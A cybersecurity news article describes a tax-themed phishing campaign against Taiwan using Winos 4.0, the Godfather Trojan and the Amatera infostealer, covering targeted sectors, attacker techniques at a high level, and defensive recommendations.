Winos 4.0 and Godfather Trojan Deployed in Targeted Cyberespionage Campaign Against Taiwan
Taiwan has become the target of an aggressive and sophisticated cyberespionage campaign involving the deployment of Winos 4.0 malware and the Godfather banking Trojan. These tools were distributed through a wave of phishing attacks exploiting tax-related themes, as disclosed in a June 2025 cyber threat briefing. The attacks, reportedly coordinated and persistent, are believed to be the work of a state-sponsored threat group—most likely linked to China—seeking to compromise Taiwan’s financial and governmental infrastructure.
The campaign’s focus on fiscal institutions and public sector databases indicates a strong intent to extract sensitive economic, personal, and governmental data. The use of infostealers like Amatera adds another layer of stealth and effectiveness, allowing attackers to maintain persistent access and exfiltrate data over time.
Overview of the Attack Campaign
The attack campaign began in early May 2025, leveraging convincingly crafted emails purporting to be from Taiwan’s Ministry of Finance. The emails contained attachments or links to malicious Microsoft Office documents embedded with weaponized macros or remote template injections. Upon opening the documents, targets unknowingly triggered the infection chain, which downloaded and executed the Winos 4.0 malware in the background.
Simultaneously, researchers found evidence that the Godfather Trojan was delivered via fake tax refund notifications, which used localized language and government branding to lure unsuspecting users into downloading malicious APKs on mobile devices or executing Windows payloads.
Winos 4.0: A Stealthy and Modular Threat
Winos 4.0 is a next-generation Windows-based infostealer with modular capabilities designed for stealth, persistence, and adaptability. Analysis of samples retrieved from infected systems revealed:
- Advanced process hollowing and in-memory execution to evade traditional antivirus solutions
- Targeted data collection focused on browser cookies, VPN configurations, email credentials, and internal documentation
- Modular plugins for lateral movement, privilege escalation, and remote command execution
- Encrypted command-and-control (C2) channels using custom DNS and HTTPS protocols
The malware’s architecture allowed operators to update and execute additional payloads, depending on the role and sensitivity of the victim’s machine.
The Godfather Trojan: Dual Targeting on Desktop and Mobile
While Godfather has been primarily associated with Android banking malware, its use in this campaign showed hybrid functionality. Attackers used cross-platform vectors to deploy versions of Godfather targeting both:
- Windows-based endpoints: Delivered through ZIP files and Office macros
- Android smartphones: Delivered through fake tax-related apps impersonating official financial tools
Once installed, Godfather initiated keylogging, SMS interception, and banking app overlays—particularly those associated with Taiwanese institutions. Victims’ credentials and multi-factor authentication (MFA) tokens were sent to external servers believed to be operated out of mainland China.
Amatera Infostealer: Silent Surveillance
Amatera, a lightweight but highly effective infostealer, was used for post-exploitation persistence. It specializes in:
- Exfiltrating cached credentials and clipboard data
- Harvesting documents with predefined keywords (e.g., “budget,” “defense,” “taxpayer”)
- Logging user behavior, including keyboard and mouse events
- Sending periodic system snapshots to attacker-controlled C2 infrastructure
The malware’s stealth and minimal footprint helped it remain undetected on many compromised systems for weeks, contributing to a longer dwell time and deeper access within organizational networks.
Targeted Sectors and Geopolitical Implications
The primary targets of this campaign included:
- Ministry of Finance and affiliated government departments
- Regional tax offices and national accounting systems
- Private financial institutions dealing in cross-border trade
- Technology firms with government contracts
The targeting of Taiwan’s financial infrastructure, especially during regional geopolitical tensions, suggests a broader agenda of strategic data acquisition, political leverage, and potential sabotage planning.
Security analysts believe this could be part of China’s larger cyberespionage strategy to monitor Taiwan’s economic activity, tax policies, and government personnel movements—information critical for both strategic influence and psychological operations.
Tactics, Techniques, and Procedures (TTPs)
The attackers employed a sophisticated array of TTPs, including:
- Spear-phishing with localized themes to increase open and click-through rates
- Multi-stage malware deployment involving dropper chains and sandbox evasion
- Living off the land techniques (LOLBins) to blend into system processes (e.g., using regsvr32, rundll32)
- Command-and-control via DNS tunneling and fake content delivery networks
- Obfuscation and anti-analysis through encoded payloads and encrypted communications
Mitigation and Defensive Recommendations
Organizations in Taiwan—and globally—should implement the following countermeasures to mitigate similar threats:
- Disable Office macros by default and enforce strict attachment scanning policies
- Conduct email filtering based on threat intelligence related to the campaign
- Deploy endpoint detection and response (EDR) solutions capable of behavior-based anomaly detection
- Monitor DNS traffic for signs of tunneling or suspicious domain lookups
- Train staff to recognize phishing themes tied to taxes, payroll, or government compliance
Cybersecurity coordination between public and private institutions is vital for early detection and response. CERT-TW and regional information sharing alliances should continue correlating IOCs and alerting potential targets.
The Winos 4.0 and Godfather malware campaign against Taiwan exemplifies the evolving threat landscape in East Asia, where cyberespionage increasingly mirrors geopolitical strategy. State-sponsored actors are refining their tactics, using tax season and fiscal systems as vectors for broader surveillance and data exfiltration.
As Taiwan continues to modernize its digital infrastructure, the challenge will lie in strengthening its cyber resilience across all sectors—particularly those dealing with national finance, governance, and technology. This campaign serves as a stark reminder that cybersecurity must remain a top-tier national defense priority in an era of cross-domain digital warfare.